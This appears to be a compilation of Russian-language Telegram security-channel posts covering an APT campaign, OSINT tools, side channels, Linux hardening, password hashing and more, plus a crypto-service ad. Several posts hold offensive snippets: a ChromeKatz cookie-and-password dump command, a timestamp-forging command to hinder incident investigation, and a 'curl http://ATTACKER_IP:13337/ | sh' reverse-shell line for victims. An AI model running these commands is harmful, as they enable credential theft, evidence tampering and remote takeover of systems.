Lotus Panda: взломы госструктур ЮВА

👋 Приветствую в мире цифровой безопасности!

Расскажу о APT-группировке Lotus-Panda.

⏺Группа Lotus Panda атаковала госструктуры и авиасектор в Юго-Восточной Азии с августа 2024 по февраль 2025. Под удар попали министерства, авиадиспетчеры, телеком и СМИ.

⏺Как атакуют: Хакеры юзают легальные .exe от Trend Micro и Bitdefender, чтобы загружать вредоносные DLL. Основной инструмент - обновлённый Sagerunex для сбора и кражи данных. Также в ход идут reverse SSH и утилиты ChromeKatz/CredentialKatz, вытаскивающие куки и пароли из Chrome.

⏺Маскировка и обход анализа: Для скрытности используют легальные тулзы: Zrok (удалённый доступ к внутренним сервисам) и datechanger.exe (подмена таймстемпов). Это мешает аналитикам отследить точку входа, которая, кстати, до сих пор не найдена.

⏺Что важно: Lotus Panda вообще не новички. С 2009 года они атакуют правительства, дипломатов и армию. Их стиль - это фишинг, эксплойты, легальный софт. Кампания показывает, что они продолжают развивать инструменты и расширяют зону охвата.

ZeroDay | #безопасность

3 лайфхака для пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках про пентесте.

⏺Zrok: легальный способ попасть во внутреннюю сеть: это инструмент от OpenZiti для шаринга локального сервиса через P2P-туннель. Используется даже легально в CI/CD, но в пентесте позволяет “протянуть” доступ к хосту без открытых портов.

zrok enable public --backed-by tcp --frontend-url tcp://:8080
# и получаем внешний endpoint

⏺datechanger.exe — запутываем аналитиков: Меняем таймстемпы файлов, чтобы затруднить расследование инцидента. Особенно полезно после дропа и запуска payload’а.

datechanger.exe -modify 01/01/2017 payload.exe

⏺ChromeKatz: воровство куков и паролей в одну команду: Развитие идеи Mimikatz, но для браузера. Извлекает логины, куки и токены прямо из Chrome-профиля.

ChromeKatz.exe -dump

ZeroDay | #пентест

Как мессенджеры шифруют сообщения (end-to-end) на самом деле

То, что кажется магией в WhatsApp или Signal, на самом деле просто: пара ключей, немного математики и алгоритм ECDH. Вы пишете «Привет», и никто, кроме собеседника, не может это прочитать, даже сервер мессенджера.

⏺В статье расскажут, как работает сквозное шифрование: от публичного и приватного ключа до симметричного shared secret, который нигде не хранится, но всегда создаётся заново. Показывают, как это устроено в браузере с Web Crypto API - прямо как у больших мессенджеров.

ZeroDay | #Статья

BlackBird: массовый OSINT-поиск на 600 сайтах

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что это: BlackBird — OSINT-инструмент, который прочёсывает ~600 сайтов в поисках заданного ника. Соцсети, платформы, маргинальные форумы - если человек где-то светился под этим именем, вы об этом узнаете.

⏺В чём крутость: Это не браузерный кликер. BlackBird работает асинхронно, сразу стреляя пачкой HTTP-запросов.
На каждый запуск тут новый user-agent (а в пуле их больше тысячи), чтобы не словить бан.
Все шаблоны проверок — в data.json.

ZeroDay | #Инструмент

🤯 Потерял 129 млн, но... отделался лёгким испугом! Как такое возможно?
Злоумышленники провели атаку «отравленными» адресами: отправили «пыль» (1.01 USDT) с кошелька, похожего на адрес контрагента жертвы.

Через минуту после пробной транзакции, пользователь получил «пыль» с фальшивого кошелька, копирующего оригинальный адрес в начале и в конце. Не проверив символы, он отправил $129 млн… прямо в руки мошенника.

🙂 Новость облетела интернет за сутки. Мошенник, возможно, испугался подобной огласки и вернул украденное обратно.

Будьте в курсе сомнительных схем. На канале КоинКит — экспертные разборы, расследования и рекомендации по защите активов.
А еще обезопась себя с промокодом GIFT10 на 10 проверок в КоинКит Лайт

Оставайтесь в безопасности с @coinkyt!

Боковые каналы: утечка данных без взлома

👋 Приветствую в мире цифровой безопасности!

Поговорим о не банальном векторе атаки - side-channel attacks.

⏺Что это вообще такое: Это способ получить инфу не из самой системы, а из побочных эффектов её работы. Шум, электромагнитное излучение, время выполнения - всё это может выдать секреты.

Посмотрим на примеры таких атак:

1️⃣Время отклика — сравнение задержек при обработке разных запросов помогает понять, какие данные лежат в памяти. Так работал [Timing Attack на TLS].
2️⃣Энергопотребление — анализ колебаний напряжения в смарткартах позволял узнать зашифрованные PIN-коды.
3️⃣Акустика — звук нажатий на клавиатуру позволяет восстановить вводимый текст с точностью до 90%.
4️⃣Cache timing — атаки вроде Spectre и Meltdown используют особенности архитектуры CPU, чтобы читать память между процессами.

⏺Чем опасно: Даже без доступа к системе можно получить приватную инфу. Часто такие атаки не логируются, а значит остаются незамеченными.

⏺Можно ли защититься: Полностью - сложно, но можно снизить риск: делают алгоритмы с одинаковым временем выполнения, рандомизируют работу (например, вставляя шум или задержки), ограничивают физический доступ и учитывают такие атаки на этапе threat modeling.

ZeroDay | #sidechannel

Защищаем Linux-сервер от lateral movement

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу, как закрыть сервер от “горизонтального перемещения” злоумышленника внутри сети.

⏺Блокируем лишний исходящий трафик: По умолчанию сервер может соединяться с любым адресом. Исправим:

# Оставим только DNS и APT
iptables -P OUTPUT DROP
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -d deb.debian.org -j ACCEPT

⏺Отключаем LLMNR и mDNS: Протоколы локального разрешения имён - подарок для атакующего. На проде не нужны:

echo "LLMNR=no" >> /etc/systemd/resolved.conf
systemctl restart systemd-resolved

# mDNS
systemctl stop avahi-daemon
systemctl disable avahi-daemon

⏺Ограничиваем доступ к сокетам ядра: /proc и /sys — часто недооценённая угроза. Убираем излишнюю информацию:

mount -o remount,hidepid=2 /proc
chmod 700 /boot

⏺Контролируем вход по SSH по UID: Создаём отдельного пользователя, которому разрешён доступ наружу, а всем остальным — нет:

iptables -A OUTPUT -m owner --uid-owner safeuser -j ACCEPT
iptables -A OUTPUT -j DROP

ZeroDay | #безопасность

Скрытые языки: как инженеры общаются без документации

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу, как в инженерных командах формируется негласный язык. Он нигде не зафиксирован, но по нему живёт и работает весь стек.

⏺Почему это работает: Письменная документация устаревает, а внутренняя культура — нет. Она передаётся через pull-запросы, архитектурные шаблоны, и особенно через «мы всегда делали так».

⏺Примеры скрытого языка на практике:

1️⃣“Сначала Redis” — правило без описания
Redis — это система для быстрого хранения данных. У команды нет документа, что её нужно использовать первой, но в коде видно: если данных нет в Redis, мы идём в базу данных и потом кладём обратно в Redis. Это — негласный стандарт.

# Python
@router.get("/profile/{id}")
def get_profile(id: int):
    cached = redis.get(id)
    if cached:
        return cached
    profile = db.fetch(id)
    redis.set(id, profile)
    return profile

2️⃣“Вся логика в switch": Вместо блок-схем и документации по архитектуре — конструкция switch, которая распределяет обработку по типам данных

// Go
switch msg.Type {
case MsgCreate:
    return s.handleCreate(msg)
case MsgDelete:
    return s.handleDelete(msg)
default:
    logger.Warn("unknown message", zap.String("type", msg.Type))
}

3️⃣deploy.sh как глас команды: CI/CD описан в устной традиции. Актуальный сценарий — это старый deploy.sh, где закодированы соглашения и порядок действий:

# Bash
docker build -t api .
docker push api
kubectl rollout restart deployment/api

Новички по нему ориентируются. Он неточен, но всё ещё указывает направление.

ZeroDay | #безопасность

Данные на продажу: что происходит с инфой после утечек

То, что кажется просто новостью в ленте — «взломали, утекло» — на самом деле только начало всего. После утечки данные не пропадают. Их разбивают, упаковывают, торгуют ими - и всё это не где-то в кино, а на реальных теневых площадках, Telegram-серверах и в Discord-группах.

⏺В статье рассказывают, как работает рынок украденных данных: кто продаёт и кто покупает, где торгуют, почему утечка может стоить $20 или $500, и зачем сама служба безопасности иногда выкупает свои же базы. Покажут, как выглядит сделка: от залитого архива до анонимной оплаты Monero.

ZeroDay | #Статья

Platypus: менеджер обратных shell-сессий на Go

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что это: Platypus - современный менеджер обратных shell-сессий на Go, который может запускать и управлять кучей подключений одновременно. В общем, можно забыть о вечных танцах с командной строкой. У Platypus есть и терминальный интерфейс, и веб-панель, и даже API, чтобы автоматизировать всё что угодно.

⏺Установка максимально простая:

git clone https://github.com/WangYihang/Platypus
cd Platypus
make install_dependency
make release
./Platypus

⏺Или через Docker:

docker-compose up -d

Готовая reverse shell-команда для жертвы:

curl http://ATTACKER_IP:13337/ | sh

ZeroDay | #Инструмент

📝 Как работает Defense in Depth?

Defense in Depth — это концепция «многослойной защиты»: если один уровень пробит, следующий всё ещё держит оборону. Типо цифрового замка с несколькими дверями.

Вот как это работает по слоям 👇

1️⃣Пользователь и устройства — антивирусы, шифрование, MFA. Всё, чтобы злоумышленник не начал с лёгкой жертвы.

2️⃣Сеть - firewall, VPN, IDS. Препятствия на маршруте пакета, прежде чем он вообще доберётся до цели.

3️⃣Приложения и сервисы - защита API, контроль доступа, безопасная разработка. Код без дыр - меньше поводов для взлома.

4️⃣Данные — шифрование, резервное копирование, защита от утечек. Даже если добрались - ничего не унесут.

5️⃣Мониторинг и реагирование - SIEM, логи, алерты, playbook’и. Увидели, что что-то пошло не так, быстро ответили.

ZeroDay | #defenseindepth

KDF: зачем хэшировать пароли сложно?

👋 Приветствую в мире цифровой безопасности!

Сегодня разберём довольно важную, но часто недооценённую тему: функции derivation ключей, или KDF (Key Derivation Function)

⏺Что это и зачем: KDF - целый подход, как сделать так, чтобы украденный хэш не превратился в пароль. Даже если база данных попала в руки хакера.

Вот в чём фишка:

1️⃣Удорожание атаки
KDF тратит на каждый пароль больше времени/памяти. Это специально, чтобы брутфорс занял не минуты, а годы.
2️⃣Соль (salt)
Каждому паролю добавляется уникальное значение. И теперь даже два одинаковых пароля → два разных хэша.
3️⃣Итерации и память
KDF гоняет пароль через себя сотни тысяч раз. Условный SHA256 — почти бесплатен. KDF — нет.
4️⃣Никаких rainbow-таблиц
Соль полностью ломает предрасчитанные таблицы. Даже у 123456 и admin теперь разный выход.

⏺Почему это критично: Потому что даже «хешированная» база легко вскрывается, если вы использовали обычный MD5 или SHA1. GPU и специализированные ASIC-фермы проверяют миллионы хэшей в секунду. А вот хороший KDF останавливает даже их.

⏺Примеры KDF, которые реально защищают:

• PBKDF2 — стабильный ветеран, до сих пор в протоколах TLS, Wi-Fi и enterprise-приложениях.
• scrypt — заточен под борьбу с GPU. Требует много памяти.
• Argon2 — современный стандарт, победитель Password Hashing Competition. Супер выбор на 2025 год.

ZeroDay | #кэширование